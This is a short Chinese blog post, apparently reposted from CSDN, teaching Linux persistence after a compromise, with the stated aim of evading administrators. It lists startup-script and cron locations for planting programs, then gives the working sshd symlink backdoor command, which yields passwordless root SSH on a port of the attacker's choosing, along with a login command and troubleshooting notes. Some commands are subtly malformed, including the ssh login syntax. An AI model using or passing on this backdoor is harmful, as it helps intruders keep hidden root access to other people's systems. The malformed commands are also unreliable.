Linux权限维持与Windows权限维持一样,根本目的都是为了躲避管理员检测。

启动项和计划任务

常用方法如下:

  1. 通过修改“/etc/rc.local”来添加启动命令
  2. 将需要开机执行的脚本放置在“/etc/profile.d/”下,可实现开机启动。
  3. 将启动脚本链接到“/etc/rc.d/rc[0~6].d/”这几个目录下,0~6代表启动级别,0代表停止,1代表单用户模式,2~5代表多用户模式,6代表重启。
  4. 修改“/etc/crontab”文件添加定时执行的程序或脚本。
  5. 将启动脚本放置到“/etc/cron.hourly”、“/etc/cron.daily”、“/etc/cron.weekly”或“/etc/cron.monthly”等周期性执行脚本的目录会定时启动。

sshd软连接

“pam_rootok.so”模块的功能是若用户UID是0,则返回成功,当“/etc/pam.d/ssh”文件配置了“auth sufficient pam_rootok.so”时可以不需要密码登录。
当在被控制端执行命令“ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=1234”建立sshd的软连接后门,PAM认证时会根据软连接的名字到“/etc/pam.d”目录寻找对应到PAM认证文件,由于软连接的文件名为“su”,所以SSH的认证文件就被替换成了“/etc/pam.d/ su”,而“su”中默认配置了“auth sufficient pam_rootok.so”,从而导致SSH可以不需要密码登录。
操作过程:
cat/etc/ssh/sshd_config | grep UsePAM #查看是否开启了PAM认证
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=1234 #建立sshd软连接后门
ssh root:1111@192.168.220.131 1234 #远程登录
补充:
可能做完这些是无法远程登录root的,原因主要有两个,一是linux在/etc/ssh/sshd_config中限制了root用户远程登录,再者就是系统防火墙策略阻挡。


版权声明:本文为duan_qiao925原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
原文链接:https://blog.csdn.net/duan_qiao925/article/details/118052461